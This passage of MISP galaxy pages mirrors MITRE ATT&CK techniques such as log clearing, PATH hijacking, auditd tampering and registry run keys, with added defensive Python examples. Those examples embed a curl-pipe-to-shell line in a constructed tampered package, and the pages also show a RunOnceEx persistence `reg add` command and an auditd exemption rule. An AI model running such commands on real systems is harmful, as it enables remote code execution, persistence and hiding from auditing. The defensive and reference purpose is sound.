Clear Linux or Mac System Logs - T1070.002
Adversaries may clear system logs to hide evidence of an intrusion. macOS and Linux both keep track of system or user-initiated actions via system logs. The majority of native system logging is stored under the /var/log/ directory. Subfolders in this directory categorize logs by their related functions, such as:(Citation: Linux Logs)
/var/log/messages: General and system-related messages
/var/log/secure or /var/log/auth.log: Authentication logs
/var/log/utmp or /var/log/wtmp: Login records
/var/log/kern.log: Kernel logs
/var/log/cron.log: Crond logs
/var/log/maillog: Mail server logs
/var/log/httpd/: Web server access and error logs
Internal MISP references
UUID 2bce5b30-7014-4a5d-ade7-12913fe6ac36
which can be used as unique global reference for Clear Linux or Mac System Logs - T1070.002
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
external_id | T1070.002 |
kill_chain | ['attack-Linux:defense-evasion', 'attack-macOS:defense-evasion'] |
mitre_data_sources | ['Command: Command Execution', 'File: File Deletion', 'File: File Modification'] |
mitre_platforms | ['Linux', 'macOS'] |
Related clusters
To see the related clusters, click here.
Clear Network Connection History and Configurations - T1070.007
Adversaries may clear or remove evidence of malicious network connections in order to clean up traces of their operations. Configuration settings as well as various artifacts that highlight connection history may be created on a system and/or in application logs from behaviors that require network connections, such as Remote Services or External Remote Services. Defenders may use these artifacts to monitor or otherwise analyze network connections created by adversaries.
Network connection history may be stored in various locations. For example, RDP connection history may be stored in Windows Registry values under (Citation: Microsoft RDP Removal):
HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default
HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers
Windows may also store information about recent RDP connections in files such as C:\Users\%username%\Documents\Default.rdp and C:\Users\%username%\AppData\Local\Microsoft\Terminal Server Client\Cache\.(Citation: Moran RDPieces) Similarly, macOS and Linux hosts may store information highlighting connection history in system logs (such as those stored in /Library/Logs and/or /var/log/).(Citation: Apple Culprit Access)(Citation: FreeDesktop Journal)(Citation: Apple Unified Log Analysis Remote Login and Screen Sharing)
Malicious network connections may also require changes to third-party applications or network configuration settings, such as Disable or Modify System Firewall or tampering to enable Proxy. Adversaries may delete or modify this data to conceal indicators and/or impede defensive analysis.
Internal MISP references
UUID 3975dbb5-0e1e-4f5b-bae1-cf2ab84b46dc
which can be used as unique global reference for Clear Network Connection History and Configurations - T1070.007
in MISP communities and other software using the MISP galaxy
External references
- https://attack.mitre.org/techniques/T1070/007 - webarchive
- https://discussions.apple.com/thread/3991574 - webarchive
- https://docs.microsoft.com/troubleshoot/windows-server/remote/remove-entries-from-remote-desktop-connection-computer - webarchive
- https://sarah-edwards-xzkc.squarespace.com/blog/2020/4/30/analysis-of-apple-unified-logs-quarantine-edition-entry-6-working-from-home-remote-logins - webarchive
- https://www.freedesktop.org/software/systemd/man/systemd-journald.service.html - webarchive
- https://www.osdfcon.org/presentations/2020/Brian-Moran_Putting-Together-the-RDPieces.pdf - webarchive
Associated metadata
Metadata key | Value |
---|---|
external_id | T1070.007 |
kill_chain | ['attack-Linux:defense-evasion', 'attack-macOS:defense-evasion', 'attack-Windows:defense-evasion', 'attack-Network:defense-evasion'] |
mitre_data_sources | ['Command: Command Execution', 'File: File Modification', 'Firewall: Firewall Rule Modification', 'Process: Process Creation', 'Windows Registry: Windows Registry Key Modification'] |
mitre_platforms | ['Linux', 'macOS', 'Windows', 'Network'] |
Related clusters
To see the related clusters, click here.
Compromise Software Dependencies and Development Tools - T1195.001
Adversaries may manipulate software dependencies and development tools prior to receipt by a final consumer for the purpose of data or system compromise. Applications often depend on external software to function properly. Popular open source projects that are used as dependencies in many applications may be targeted as a means to add malicious code to users of the dependency.(Citation: Trendmicro NPM Compromise)
Targeting may be specific to a desired victim set or may be distributed to a broad set of consumers but only move on to additional tactics on specific victims.
Internal MISP references
UUID 191cc6af-1bb2-4344-ab5f-28e496638720
which can be used as unique global reference for Compromise Software Dependencies and Development Tools - T1195.001
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
external_id | T1195.001 |
kill_chain | ['attack-Linux:initial-access', 'attack-macOS:initial-access', 'attack-Windows:initial-access'] |
mitre_data_sources | ['File: File Metadata'] |
mitre_platforms | ['Linux', 'macOS', 'Windows'] |
Related clusters
To see the related clusters, click here.
Windows File and Directory Permissions Modification - T1222.001
Adversaries may modify file or directory permissions/attributes to evade access control lists (ACLs) and access protected files.(Citation: Hybrid Analysis Icacls1 June 2018)(Citation: Hybrid Analysis Icacls2 May 2018) File and directory permissions are commonly managed by ACLs configured by the file or directory owner, or users with the appropriate permissions. File and directory ACL implementations vary by platform, but generally explicitly designate which users or groups can perform which actions (read, write, execute, etc.).
Windows implements file and directory ACLs as Discretionary Access Control Lists (DACLs).(Citation: Microsoft DACL May 2018) Similar to a standard ACL, a DACL identifies the accounts that are allowed or denied access to a securable object. When an attempt is made to access a securable object, the system checks the access control entries (ACEs) in the DACL in order, stopping as soon as the ACEs examined so far allow every requested access right, or as soon as any ACE denies one of the requested rights; if the end of the DACL is reached without all requested rights being granted, access is denied.(Citation: Microsoft Access Control Lists May 2018) Two edge cases matter for this technique: an object whose security descriptor has no DACL at all (a NULL DACL) is accessible to everyone, whereas an empty DACL denies access to everyone.
Adversaries can interact with the DACLs using built-in Windows commands, such as icacls, cacls, takeown, and attrib, which can grant adversaries higher permissions on specific files and folders. Further, PowerShell provides cmdlets (Get-Acl and Set-Acl) that can be used to retrieve or modify file and directory DACLs. Specific file and directory modifications may be a required step for many techniques, such as establishing Persistence via Accessibility Features, Boot or Logon Initialization Scripts, or tainting/hijacking other instrumental binary/configuration files via Hijack Execution Flow.
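Added example, not Microsoft code: a model of the DACL walk described above, reduced to a 4-bit rights mask instead of the real ACCESS_MASK, plain-string trustees instead of SIDs, and no inheritance. It shows why ACE order matters (a deny placed after a matching allow never fires) and what an icacls /grant issued by an adversary who has first taken ownership changes for an ordinary user. The account names, groups and file DACLs are constructed.

```python
"""Model of the Windows DACL walk: ordered ACEs, first decisive match wins."""
from dataclasses import dataclass
from typing import List, Optional, Set

READ, WRITE, EXECUTE, DELETE = 1, 2, 4, 8
FULL = READ | WRITE | EXECUTE | DELETE


@dataclass(frozen=True)
class Ace:
    kind: str       # "allow" or "deny"
    trustee: str    # account or group the ACE applies to
    mask: int       # rights covered by this ACE


def check_access(dacl: Optional[List[Ace]], token_groups: Set[str], requested: int) -> bool:
    """Walk the DACL in order, the way the reference monitor does.

    Grant once the allow ACEs seen so far cover every requested right; deny as
    soon as a deny ACE touches any requested right. A NULL DACL (None) means no
    protection at all, while an empty DACL ([]) grants nothing to anyone.
    """
    if dacl is None:
        return True
    granted = 0
    for ace in dacl:
        if ace.trustee not in token_groups:
            continue
        if ace.kind == "deny" and ace.mask & requested:
            return False
        if ace.kind == "allow":
            granted |= ace.mask & requested
            if granted == requested:
                return True
    return False


def grant(dacl: List[Ace], trustee: str, mask: int) -> List[Ace]:
    """Effect of `icacls <file> /grant <trustee>:<mask>` on the list: a new
    allow ACE. Real icacls places it in canonical order (after explicit
    denies); appending is enough for this demonstration."""
    return list(dacl) + [Ace("allow", trustee, mask)]


BROAD_GROUPS = {"Everyone", "Users", "Authenticated Users"}


def weak_aces(dacl: List[Ace]) -> List[Ace]:
    """Allow ACEs that hand WRITE or DELETE to a broad group: the kind of entry
    a defender wants to catch in file-permission-change telemetry."""
    return [a for a in dacl
            if a.kind == "allow" and a.trustee in BROAD_GROUPS
            and a.mask & (WRITE | DELETE)]


# Constructed scenario: a config file readable only by admins, then opened up.
USER_TOKEN = {"alice", "Users", "Authenticated Users", "Everyone"}
BEFORE = [Ace("allow", "SYSTEM", FULL), Ace("allow", "Administrators", FULL)]
AFTER = grant(BEFORE, "Users", FULL)

# Same two ACEs, canonical vs non-canonical order: only the first blocks WRITE.
CANONICAL = [Ace("deny", "Users", WRITE), Ace("allow", "Users", READ | WRITE)]
NON_CANONICAL = [Ace("allow", "Users", READ | WRITE), Ace("deny", "Users", WRITE)]

if __name__ == "__main__":
    print("alice can read before grant:", check_access(BEFORE, USER_TOKEN, READ))
    print("alice has full after grant:", check_access(AFTER, USER_TOKEN, FULL))
    print("weak ACEs after grant:", weak_aces(AFTER))
    print("canonical denies write:", not check_access(CANONICAL, USER_TOKEN, WRITE))
    print("non-canonical allows write:", check_access(NON_CANONICAL, USER_TOKEN, WRITE))
```

The non-canonical case is the reason tools that rewrite DACLs by hand (rather than through the SetEntriesInAcl/icacls paths that re-canonicalize) can leave a deny entry that looks protective in the UI but is never reached.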
Internal MISP references
UUID 34e793de-0274-4982-9c1a-246ed1c19dee
which can be used as unique global reference for Windows File and Directory Permissions Modification - T1222.001
in MISP communities and other software using the MISP galaxy
External references
- https://attack.mitre.org/techniques/T1222/001 - webarchive
- https://docs.microsoft.com/en-us/windows/win32/secauthz/access-control-lists - webarchive
- https://docs.microsoft.com/windows/desktop/secauthz/dacls-and-aces - webarchive
- https://www.eventtracker.com/tech-articles/monitoring-file-permission-changes-windows-security-log/ - webarchive
- https://www.hybrid-analysis.com/sample/22dab012c3e20e3d9291bce14a2bfc448036d3b966c6e78167f4626f5f9e38d6?environmentId=110 - webarchive
- https://www.hybrid-analysis.com/sample/ef0d2628823e8e0a0de3b08b8eacaf41cf284c086a948bdfd67f4e4373c14e4d?environmentId=100 - webarchive
Associated metadata
Metadata key | Value |
---|---|
external_id | T1222.001 |
kill_chain | ['attack-Windows:defense-evasion'] |
mitre_data_sources | ['Active Directory: Active Directory Object Modification', 'Command: Command Execution', 'File: File Metadata', 'Process: Process Creation'] |
mitre_platforms | ['Windows'] |
Related clusters
To see the related clusters, click here.
Compromise Software Dependencies and Development Tools - T1474.001
Adversaries may manipulate products or product delivery mechanisms prior to receipt by a final consumer for the purpose of data or system compromise. Applications often depend on external software to function properly. Popular open source projects that are used as dependencies in many applications may be targeted as a means to add malicious code to users of the dependency.(Citation: Grace-Advertisement)
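Added example serving both the T1195.001 entry above and this T1474.001 entry; it is not the code of any project named on this page. It mirrors the hash-pinning model used by lockfiles and by pip's --require-hashes: the lockfile records the digest of the artifact that was reviewed, and a later download that differs (for example a tampered release re-published under the same version with stolen maintainer credentials) is rejected instead of installed. The package name, version, hashes and artifact bytes are constructed.

```python
"""Fail-closed verification of dependency artifacts against pinned hashes."""
import hashlib
import re

PIN_RE = re.compile(
    r"^(?P<name>[A-Za-z0-9][A-Za-z0-9._-]*)==(?P<version>\S+)"
    r"(?P<hashes>(?:\s+--hash=sha256:[0-9a-f]{64})+)\s*$")


def parse_lockfile(text: str) -> dict:
    """Map package name -> (version, set of acceptable sha256 digests).

    Every non-comment line must carry a version pin and at least one hash;
    an unpinned line is an error, because one unpinned dependency is enough
    to let a tampered upstream in. Single-line entries only (no backslash
    continuations).
    """
    pins = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        m = PIN_RE.match(line)
        if not m:
            raise ValueError(f"unpinned or malformed requirement: {line!r}")
        digests = set(re.findall(r"sha256:([0-9a-f]{64})", m["hashes"]))
        pins[m["name"].lower()] = (m["version"], digests)
    return pins


def verify_artifact(pins: dict, name: str, version: str, data: bytes):
    """Return (ok, reason). Only an exact version and a listed digest pass."""
    pin = pins.get(name.lower())
    if pin is None:
        return False, "not in lockfile"
    want_version, digests = pin
    if version != want_version:
        return False, f"version {version} is not the pinned {want_version}"
    digest = hashlib.sha256(data).hexdigest()
    if digest not in digests:
        return False, f"sha256 mismatch: got {digest}"
    return True, "ok"


# Constructed artifacts: the reviewed archive and a tampered replacement that
# someone holding the maintainer's publishing credentials could have uploaded.
REVIEWED = b"PK\x03\x04 hypothetical-sdk-2.4.1 contents: def connect(): ...\n"
TAMPERED = REVIEWED + b"import os; os.system('curl http://198.51.100.7/s | sh')\n"

# The lockfile is generated from the reviewed bytes, as a lock tool would do.
LOCKFILE = (
    "# generated after review; do not edit by hand\n"
    f"hypothetical-sdk==2.4.1 --hash=sha256:{hashlib.sha256(REVIEWED).hexdigest()}\n"
)

if __name__ == "__main__":
    pins = parse_lockfile(LOCKFILE)
    print(verify_artifact(pins, "hypothetical-sdk", "2.4.1", REVIEWED))
    print(verify_artifact(pins, "hypothetical-sdk", "2.4.1", TAMPERED))
    print(verify_artifact(pins, "hypothetical-sdk", "2.4.2", REVIEWED))
```

The same check applies to development tools: pin the digest of the compiler, SDK or build container you reviewed, and refuse to build with anything else. Hash pinning does not help when the reviewed artifact was already malicious; it only guarantees that what you reviewed is what you install.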
Internal MISP references
UUID 7827ced0-95e7-4d05-bdcf-0d8f2d37a3d3
which can be used as unique global reference for Compromise Software Dependencies and Development Tools - T1474.001
in MISP communities and other software using the MISP galaxy
External references
- https://attack.mitre.org/techniques/T1474/001 - webarchive
- https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-6.html - webarchive
- https://pages.nist.gov/mobile-threat-catalogue/supply-chain-threats/SPC-0.html - webarchive
- https://pages.nist.gov/mobile-threat-catalogue/supply-chain-threats/SPC-10.html - webarchive
- https://pages.nist.gov/mobile-threat-catalogue/supply-chain-threats/SPC-15.html - webarchive
- https://pages.nist.gov/mobile-threat-catalogue/supply-chain-threats/SPC-3.html - webarchive
- https://pages.nist.gov/mobile-threat-catalogue/supply-chain-threats/SPC-9.html - webarchive
- https://www.csc2.ncsu.edu/faculty/xjiang4/pubs/WISEC12_ADRISK.pdf - webarchive
Associated metadata
Metadata key | Value |
---|---|
external_id | T1474.001 |
kill_chain | ['mobile-attack-Android:initial-access', 'mobile-attack-iOS:initial-access'] |
mitre_platforms | ['Android', 'iOS'] |
Related clusters
To see the related clusters, click here.
Path Interception by PATH Environment Variable - T1574.007
Adversaries may execute their own malicious payloads by hijacking environment variables used to load libraries. The PATH environment variable contains a list of directories (User and System) that the OS searches sequentially through in search of the binary that was called from a script or the command line.
Adversaries can place a malicious program in an earlier entry in the list of directories stored in the PATH environment variable, resulting in the operating system executing the malicious binary rather than the legitimate binary when it searches sequentially through that PATH listing.
For example, on Windows, if an adversary places a malicious program named "net.exe" in C:\example path, and that directory appears before C:\Windows\system32 in the PATH environment variable, then when "net" is executed from the command line, C:\example path\net.exe will be called instead of the system's legitimate executable at C:\Windows\system32\net.exe. Some methods of executing a program rely on the PATH environment variable to determine the locations that are searched when the path for the program is not given, such as executing programs from a Command and Scripting Interpreter.(Citation: ExpressVPN PATH env Windows 2021)
Adversaries may also directly modify the $PATH variable specifying the directories to be searched. An adversary can modify the $PATH variable to point to a directory they have write access to. When a program using the $PATH variable is called, the OS searches the specified directory and executes the malicious binary. On macOS, this can also be performed through modifying the $HOME variable. These variables can be modified using the command line, launchctl, Unix Shell Configuration Modification, or modifying the /etc/paths.d folder contents.(Citation: uptycs Fake POC linux malware 2023)(Citation: nixCraft macOS PATH variables)(Citation: Elastic Rules macOS launchctl 2022)
Internal MISP references
UUID 0c2d00da-7742-49e7-9928-4514e5075d32
which can be used as unique global reference for Path Interception by PATH Environment Variable - T1574.007
in MISP communities and other software using the MISP galaxy
External references
- https://attack.mitre.org/techniques/T1574/007 - webarchive
- https://www.cyberciti.biz/faq/appleosx-bash-unix-change-set-path-environment-variable/ - webarchive
- https://www.elastic.co/guide/en/security/7.17/prebuilt-rule-7-16-4-modification-of-environment-variable-via-launchctl.html - webarchive
- https://www.expressvpn.com/blog/cybersecurity-lessons-a-path-vulnerability-in-windows/ - webarchive
- https://www.uptycs.com/blog/new-poc-exploit-backdoor-malware - webarchive
Associated metadata
Metadata key | Value |
---|---|
external_id | T1574.007 |
kill_chain | ['attack-Windows:persistence', 'attack-macOS:persistence', 'attack-Linux:persistence', 'attack-Windows:privilege-escalation', 'attack-macOS:privilege-escalation', 'attack-Linux:privilege-escalation', 'attack-Windows:defense-evasion', 'attack-macOS:defense-evasion', 'attack-Linux:defense-evasion'] |
mitre_data_sources | ['File: File Creation', 'Process: Process Creation', 'Windows Registry: Windows Registry Key Modification'] |
mitre_platforms | ['Windows', 'macOS', 'Linux'] |
Related clusters
To see the related clusters, click here.
Path Interception by Search Order Hijacking - T1574.008
Adversaries may execute their own malicious payloads by hijacking the search order used to load other programs. Because some programs do not call other programs using the full path, adversaries may place their own file in the directory where the calling program is located, causing the operating system to launch their malicious software at the request of the calling program.
Search order hijacking occurs when an adversary abuses the order in which Windows searches for programs that are not given a path. Unlike DLL Search Order Hijacking, the search order differs depending on the method that is used to execute the program. (Citation: Microsoft CreateProcess) (Citation: Windows NT Command Shell) (Citation: Microsoft WinExec) However, it is common for Windows to search in the directory of the initiating program before searching through the Windows system directory. An adversary who finds a program vulnerable to search order hijacking (i.e., a program that does not specify the path to an executable) may take advantage of this vulnerability by creating a program named after the improperly specified program and placing it within the initiating program's directory.
For example, "example.exe" runs "cmd.exe" with the command-line argument net user. An adversary may place a program called "net.exe" within the same directory as example.exe; "net.exe" will then be run instead of the Windows system utility net. In addition, if an adversary places a program called "net.com" in the same directory as "net.exe", then cmd.exe /C net user will execute "net.com" instead of "net.exe" due to the order of executable extensions defined under PATHEXT. (Citation: Microsoft Environment Property)
Search order hijacking is also a common practice for hijacking DLL loads and is covered in DLL Search Order Hijacking.
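Added example (not Microsoft code) covering both the T1574.007 entry above and this T1574.008 entry: a model of how a bare command name is resolved on Windows. createprocess_order approximates the CreateProcess search when no path is given (the calling program's directory, the current directory, the system and Windows directories, then PATH); cmd_order approximates cmd.exe (current directory, then PATH). Within each directory the PATHEXT extensions are tried in order, which is why net.com wins over net.exe. The file system, PATH and directory names are constructed, and the 16-bit system directory and SafeProcessSearchMode wrinkles are left out.

```python
"""Model of Windows executable resolution for PATH and search-order hijacks."""
import ntpath
from typing import Iterable, List, Optional

DEFAULT_PATHEXT = [".COM", ".EXE", ".BAT", ".CMD"]   # leading entries of the default


def split_path_env(path_env: str) -> List[str]:
    return [d.strip() for d in path_env.split(";") if d.strip()]


def createprocess_order(app_dir: str, cwd: str, system_dir: str,
                        windows_dir: str, path_env: str) -> List[str]:
    """Directories CreateProcess probes for a pathless module name."""
    return [app_dir, cwd, system_dir, windows_dir] + split_path_env(path_env)


def cmd_order(cwd: str, path_env: str) -> List[str]:
    """Directories cmd.exe probes for a bare command."""
    return [cwd] + split_path_env(path_env)


def candidates(command: str, search_dirs: Iterable[str],
               pathext: List[str] = DEFAULT_PATHEXT) -> Iterable[str]:
    """Full paths that would be probed, in order, for `command`."""
    base, ext = ntpath.splitext(command)
    exts = [ext] if ext else pathext
    for d in search_dirs:
        for e in exts:
            yield ntpath.join(d, base + e)


def resolve(command: str, search_dirs: Iterable[str], existing: Iterable[str],
            pathext: List[str] = DEFAULT_PATHEXT) -> Optional[str]:
    """First probe that exists (case-insensitive), or None."""
    present = {ntpath.normcase(p): p for p in existing}
    for cand in candidates(command, search_dirs, pathext):
        hit = present.get(ntpath.normcase(cand))
        if hit is not None:
            return hit
    return None


def writable_dirs_before_system(path_env: str, system_dir: str,
                                user_writable: Iterable[str]) -> List[str]:
    """PATH entries a standard user can write to that are searched before the
    system directory: each one is a T1574.007 planting spot."""
    writable = {ntpath.normcase(d) for d in user_writable}
    out = []
    for d in split_path_env(path_env):
        if ntpath.normcase(d) == ntpath.normcase(system_dir):
            break
        if ntpath.normcase(d) in writable:
            out.append(d)
    return out


# Constructed file system and environment.
SYSTEM32 = r"C:\Windows\System32"
WINDIR = r"C:\Windows"
APP_DIR = r"C:\Program Files\Example"
CWD = r"C:\Users\alice"
PATH_ENV = r"C:\example path;C:\Windows\System32;C:\Windows"
USER_WRITABLE = [r"C:\example path", r"C:\Users\alice\AppData\Local\Temp"]

CLEAN_FS = {
    ntpath.join(SYSTEM32, "net.exe"),
    ntpath.join(SYSTEM32, "cmd.exe"),
    ntpath.join(APP_DIR, "example.exe"),
}
# T1574.007: attacker-controlled net.exe in a writable dir that precedes System32.
PATH_HIJACK_FS = CLEAN_FS | {r"C:\example path\net.exe"}
# T1574.008: net.exe and net.com dropped beside the program that calls "net".
SEARCH_ORDER_FS = CLEAN_FS | {ntpath.join(APP_DIR, "net.exe"), ntpath.join(APP_DIR, "net.com")}

if __name__ == "__main__":
    cp = createprocess_order(APP_DIR, CWD, SYSTEM32, WINDIR, PATH_ENV)
    print("clean:", resolve("net", cp, CLEAN_FS))
    print("cmd.exe with PATH hijack:", resolve("net", cmd_order(CWD, PATH_ENV), PATH_HIJACK_FS))
    print("CreateProcess with PATH hijack:", resolve("net", cp, PATH_HIJACK_FS))
    print("search order hijack:", resolve("net", cp, SEARCH_ORDER_FS))
    print("writable before System32:", writable_dirs_before_system(PATH_ENV, SYSTEM32, USER_WRITABLE))
```

One result worth noticing: the PATH hijack only wins for the cmd.exe-style lookup, because CreateProcess consults the system directory before PATH, whereas the search-order hijack wins for both, since the calling program's own directory is probed first in either case. Calling with a fully qualified path defeats both.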
Internal MISP references
UUID 58af3705-8740-4c68-9329-ec015a7013c2
which can be used as unique global reference for Path Interception by Search Order Hijacking - T1574.008
in MISP communities and other software using the MISP galaxy
External references
- http://msdn.microsoft.com/en-us/library/ms682425 - webarchive
- http://msdn.microsoft.com/en-us/library/ms687393 - webarchive
- https://attack.mitre.org/techniques/T1574/008 - webarchive
- https://docs.microsoft.com/en-us/previous-versions//cc723564(v=technet.10)?redirectedfrom=MSDN#XSLTsection127121120120 - webarchive
- https://docs.microsoft.com/en-us/previous-versions//fd7hxfdd(v=vs.85)?redirectedfrom=MSDN - webarchive
Associated metadata
Metadata key | Value |
---|---|
external_id | T1574.008 |
kill_chain | ['attack-Windows:persistence', 'attack-Windows:privilege-escalation', 'attack-Windows:defense-evasion'] |
mitre_data_sources | ['File: File Creation', 'File: File Modification', 'Process: Process Creation'] |
mitre_platforms | ['Windows'] |
Related clusters
To see the related clusters, click here.
Disable or Modify Linux Audit System - T1562.012
Adversaries may disable or modify the Linux audit system to hide malicious activity and avoid detection. Linux admins use the Linux Audit system to track security-relevant information on a system. The Linux Audit system operates at the kernel-level and maintains event logs on application and system activity such as process, network, file, and login events based on pre-configured rules.
Often referred to as auditd, this is the name of the daemon used to write events to disk and is governed by the parameters set in the /etc/audit/auditd.conf configuration file. Two primary ways to configure the log generation rules are through the command line auditctl utility and the file /etc/audit/audit.rules, containing a sequence of auditctl commands loaded at boot time (on distributions that use augenrules, audit.rules is assembled from the fragments in /etc/audit/rules.d/).(Citation: Red Hat System Auditing)(Citation: IzyKnows auditd threat detection 2022)
With root privileges, adversaries may be able to ensure their activity is not logged through disabling the Audit system service, editing the configuration/rule files, or by hooking the Audit system library functions. Using the command line, adversaries can disable the Audit system service through killing processes associated with the auditd daemon or use systemctl to stop the Audit service. Adversaries can also hook Audit system functions to disable logging or modify the rules contained in the /etc/audit/audit.rules or auditd.conf files to ignore malicious activity.(Citation: Trustwave Honeypot SkidMap 2023)(Citation: ESET Ebury Feb 2014) Unless the rule set was locked with auditctl -e 2 (after which changes require a reboot), a root user can also flush or rewrite the active rules at runtime with auditctl itself, without touching any file.
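Added example, not Red Hat or auditd project code: a reviewer for an audit.rules file that looks for the weakening described above. It reads rules in auditctl syntax (one command per line) and reports whether the configuration is locked (-e 2), whether a -D flush appears after rules were already defined, whether any rule exempts activity with a never action, and whether watches on the audit configuration and log directories are missing. The two rule files and the /opt/.cache path are constructed.

```python
"""Review an auditd rule set for signs it was disabled, flushed or carved out."""
import shlex
from typing import Dict, List, Sequence

REQUIRED_WATCHES = ("/etc/audit/", "/var/log/")


def parse_rules(text: str) -> List[List[str]]:
    """Split rule text into argv lists, dropping blank lines and comments."""
    rules = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if line:
            rules.append(shlex.split(line))
    return rules


def assess(text: str, required_watches: Sequence[str] = REQUIRED_WATCHES) -> Dict:
    rules = parse_rules(text)
    enabled = None          # value of the last -e seen, None if absent
    active = 0              # watch/syscall rules still in effect
    watched: List[str] = []
    exemptions: List[str] = []
    findings: List[str] = []
    for lineno, argv in enumerate(rules, 1):
        flag = argv[0]
        if flag == "-D":
            if active:
                findings.append(f"rule {lineno}: -D discards the {active} rule(s) above it")
            active, watched = 0, []
        elif flag == "-e" and len(argv) > 1:
            enabled = int(argv[1])
        elif flag == "-w" and len(argv) > 1:
            active += 1
            watched.append(argv[1])
        elif flag in ("-a", "-A") and len(argv) > 1:
            # -a/-A take "action,list" in either order, e.g. always,exit or exit,never
            if "never" in argv[1].split(","):
                exemptions.append(" ".join(argv))
            else:
                active += 1
    if enabled == 0:
        findings.append("auditing disabled (-e 0)")
    elif enabled != 2:
        findings.append("rules not locked (-e 2 absent): auditctl can alter them at runtime")
    if active == 0:
        findings.append("no watch or syscall rules in effect")
    for ex in exemptions:
        findings.append(f"exemption rule: {ex}")
    for path in required_watches:
        if not any(w.rstrip("/") == path.rstrip("/") for w in watched):
            findings.append(f"no watch on {path}")
    return {"enabled": enabled, "active_rules": active,
            "exemptions": exemptions, "findings": findings}


# Constructed: a reasonable baseline, and the same file after an intruder edited it.
HARDENED = """
-D
-b 8192
-w /etc/passwd -p wa -k identity
-w /etc/audit/ -p wa -k auditconfig
-w /var/log/ -p wa -k logs
-a always,exit -F arch=b64 -S execve -k exec
-e 2
"""

TAMPERED = """
-D
-b 8192
-w /etc/passwd -p wa -k identity
# exemption placed first: the kernel uses the first matching rule, so execve
# under /opt/.cache is never recorded, and the config watches are gone
-a never,exit -F arch=b64 -S execve -F dir=/opt/.cache -k ignore
-a always,exit -F arch=b64 -S execve -k exec
-e 1
"""

if __name__ == "__main__":
    for label, text in (("hardened", HARDENED), ("tampered", TAMPERED)):
        print(label, assess(text)["findings"])
```

Running this against the on-disk file only catches file edits; compare the file against auditctl -l output as well, since a runtime auditctl -D leaves the file untouched and is exactly what -e 2 exists to prevent.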
Internal MISP references
UUID 562e9b64-7239-493d-80f4-2bff900d9054
which can be used as unique global reference for Disable or Modify Linux Audit System - T1562.012
in MISP communities and other software using the MISP galaxy
External references
- https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/6/html/security_guide/chap-system_auditing - webarchive
- https://attack.mitre.org/techniques/T1562/012 - webarchive
- https://izyknows.medium.com/linux-auditd-for-threat-detection-d06c8b941505 - webarchive
- https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/honeypot-recon-new-variant-of-skidmap-targeting-redis/ - webarchive
- https://www.welivesecurity.com/2014/02/21/an-in-depth-analysis-of-linuxebury/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
external_id | T1562.012 |
kill_chain | ['attack-Linux:defense-evasion'] |
mitre_data_sources | ['Command: Command Execution', 'File: File Deletion', 'File: File Modification', 'Process: OS API Execution', 'Process: Process Modification'] |
mitre_platforms | ['Linux'] |
Related clusters
To see the related clusters, click here.
Registry Run Keys / Startup Folder - T1060
Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in. (Citation: Microsoft Run Key) These programs will be executed under the context of the user and will have the account's associated permissions level.
Placing a program within a startup folder will cause that program to execute when a user logs in. There is a startup folder location for individual user accounts as well as a system-wide startup folder that will be checked regardless of which user account logs in.
The startup folder path for the current user is:
* C:\Users\[Username]\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup
The startup folder path for all users is:
* C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp
The following run keys are created by default on Windows systems:
* HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
* HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce
* HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
* HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce
The HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnceEx key is also available but is not created by default on Windows Vista and newer. Registry run key entries can reference programs directly or list them as a dependency. (Citation: Microsoft RunOnceEx APR 2018) For example, it is possible to load a DLL at logon using a "Depend" key with RunOnceEx: reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /d "C:\temp\evil[.]dll" (Citation: Oddvar Moe RunOnceEx Mar 2018)
The following Registry keys can be used to set startup folder items for persistence:
* HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
* HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
* HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
* HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
The following Registry keys can control automatic startup of services during boot:
* HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce
* HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce
* HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices
* HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunServices
Using policy settings to specify startup programs creates corresponding values in either of two Registry keys:
* HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run
* HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run
The Winlogon key controls actions that occur when a user logs on to a computer running Windows. Most of these actions are under the control of the operating system, but custom actions can also be added here. The Userinit and Shell values under HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon can automatically launch programs.
Programs listed in the load value of the registry key HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows run automatically for the currently logged-on user (HKEY_CURRENT_USER is a per-user hive, so the entry applies to that user rather than to everyone who logs on).
By default, the multistring BootExecute value of the registry key HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager
